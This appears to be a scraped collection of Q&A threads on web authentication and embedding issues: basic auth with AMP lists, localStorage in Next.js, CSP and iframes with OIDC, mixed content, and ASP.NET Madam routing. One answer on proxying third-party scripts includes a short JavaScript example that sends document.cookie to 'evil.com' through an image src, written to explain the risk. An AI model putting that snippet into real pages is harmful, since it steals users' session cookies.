I have an AMP page which my client wants to test before we release it. We secure our client testing environment using basic authentication.
I'm using an AMP list with a JSON src attribute to template my list
<amp-list width="auto" height="720" layout="fixed-height" src="/amp/_data/mydata.json">
<template type="amp-mustache" id="amp-template-id">
<div>
{{linkText}}
</div>
</template>
</amp-list>
When I load this page in Chrome the server responds with a 401, which suggests that assets on the page aren't being loaded using the basic authentication credentials used for the AMP page.
Without specifying the username and password in the URL (eg. http://user:password#my.staging.server...) is there any way I can get additional requests to be made using the same basic authentication credentials as the AMP page?
It may be because you are using a relative URL for your JSON data?
It's my understanding that AMP generally discourages this because it won't be the correct link if the AMP page is delivered from AMP Cache.
Related
I want user will not redirect to login page on closing website or browser once user is loggedIn.for this i use localStorage. it is working successfully but, it works after page rendering in nextjs. so, it give me error for 5 seconds. i want to access localStorage before page rendering in nextjs.[![First image shown when website is launch
Local Storage is only available in the browser. It will not be available on the server (or while the page is doing any kind of server-side operation).
https://developer.mozilla.org/en-US/docs/Web/API/Window/localStorage
You should use a cookie to store this information if it needs to be accessible by both the server AND client.
We have a requirement to load an internally hosted angular UI from within an external partners secured website. We're using an OIDC auth flow calling to an internal IDP server to retrieve/validate the user tokens.
The problem is we are not able to make custom modifications to the internal IDP server's rules in order to allow the external partners domain as being valid for calling to from within an iframe (Content Security Policy).
This causes us to get an error related to invalid Content Security Policy as the external partners domain is not within the allowed domains list of the CSP. If we serve this UI in an iframe from within an internal company domain (allowed in the CSP) it works just fine.
Assuming we have to load our internal UI from within the partners website inline (iframe or other), and authenticate our users using an oauth pattern are there any viable solutions for this problem?
I understand the CSP and x-frame-option headers are set this way to avoid click-jacking security risks, so not sure what is being asked of us is possible while remaining secure. Initial thought is to possibly put a proxy service between the partners website and our UI and the proxy service will handle the authentication...bypassing the CSP rules...but does not necessarily seem secure, and not sure how to implement that even if so. Any thoughts or ideas would be welcomed. Thanks!
Proxying third-party scripts is a bad idea. Consider the script:
var Img = document.createElement("img");
Img.setAttribute('src', 'http://evil.com?cookie=' + document.cookie);
document.body.appendChild(Img);
Loaded from someone else's domain, the script will not have access to the document.cookie. But after proxying, the browser counts that the script is loaded from your domain, and will send cookies to the evil.com site.
Allowing your site to be embedded into iframe open doors to:
clickjacking: by placing an invisible frame, it allows you to perform actions on behalf of a visitor if he is logged at third-party site.
Phishing: in the case of an iframe, the user does not see the real URL in the address bar. Therefore, an attacker can load an iframe from his domain that looks like a third-party authorization site. Since visitor is not able to see this, he enter login/password at the attackers site.
third-party scripts access to some sensitive user's data such as: geolocation, camera, microphone, speaker, mobile device sensors (accelerometer, gyroscope, ambient-light-sensor, magnetometer, vibrate) etc. See Feature Policy / Permissions Policy how to restrict these.
For using your IDP server for autentificating user on third-party site, you MUST do redirect to your domain, autentificate user on your domainm and redirect user back to the third-party site. To keep auth a JWT token can be used or third-party site can set its own auth cookie. The referrer is used to return back to the partner's page where auth was started. Google's OAuth2 service works in this way.
It is not known what private/financial data your web application is dealing with, but it is unlikely that you want to be responsible for the actions of third parties by making a hole in the security system for them.
We have a website which provides referral options for healthcare provider via digital signature. We are upgrading our website security policy to not redirect to the third party website for esignature. instead of redirecting to the thirdparty website we are trying to embed the thirdparty website inside our website for esignature.
now the technical question:
we are using iFrame to embed the thirdparty website. we have the custom third party link for each signature which needs to load in this iFrame.
our website is on HTTPS and the third party site is also on HTTPS.
We are getting below error even though the third party URL used is on https
**The page at 'https://mywebsite.com/' was loaded over HTTPS, but requested an insecure resource 'http://MyThirdPartyIntegratedWebsite' This request has been blocked; the content must be served over HTTPS**
URL is formed for each user which is customized for his signature
$scope.detailFrame = 'https://MyThirdPartyIntegratedWebsite/userID=123'
Whiltelisted the third party website too.
$sceDelegateProvider.resourceUrlWhitelist([
// Allow same origin resource loads.
'self',
// Allow loading from our assets domain. Notice the difference between * and **.
'https://MyThirdPartyIntegratedWebsite/**'
]);
How to avoid iFrame from calling thirdparty website insecurely?
It was actually the internal redirects from the third party website which was causing the problem. We initiated a call with them to resolve this. Thank you sideshowba
I'm using a plugin in WordPress that uses the Google Maps API but keep getting this error:
[blocked] Access to geolocation was blocked over secure connection with mixed content to...
My site is on SSL, and I've checked that the google API script is not trying to be pulled in via http (it is https as it should be).
I'm not sure what could be causing this issue. Maybe there is something I need to do in my htaccess file? Please help! Thanks!
Check below list,
Your site have http link instead of https links, so only you facing the mixed content warning( you can fine this warning in your browser console). Find those links in your website and change those as a https links.
Add google API key in configuration.
https://developers.google.com/maps/documentation/javascript/get-api-key
I have an ASP .NET website which uses Forms authentication to secure certain parts of the site. The site has a module that uses custom Basic authentication.
I use Madam https://msdn.microsoft.com/en-us/library/aa479391.aspx to route specified request.url to Basic Authentication handler.
My Web.config specifies which requests go to basic authentication.
<madam>
<formsAuthenticationDisposition>
<discriminators all="true">
<discriminator
inputExpression="Request.Url"
pattern="/RouteMeToBasicAuthentication"
type="Madam.RegexDiscriminator" />
</discriminators>
</formsAuthenticationDisposition>
</madam>
As a result requests to ‘/RouteMeToBasicAuthentication’ are routed correctly to basic authentication.
I can log into my application using forms authentication.
The problem is that all .js and .css requests are routed to my Basic authentication module. These requested are originated from Forms authenticated .aspx pages. As a result all .js and .css requests are rejected as unauthorized
1. Request URL: http://myApplication/Scripts/jquery-ui.min.js
2. Request Method: GET
3. Status Code: 401 Unauthorized
I do not want .js and .css requests forwarded to the basic authentication module. How to do this? Why Madam routes these requests to the Basic Authentication?
Without Madam IIS assumes that resources such as .js, .jpg, etc, are all static resources, and thus doesn't need to pass them through the ASP.NET engine. I do not also want .js request to go to the ASP.NET engine since it has negative effect on the application performance.
A dirty workaround would be that I white list my css and js folders in the custom basic authentication module. I do not want to do that. I would like to have the problem fixed in the right place. How to do that?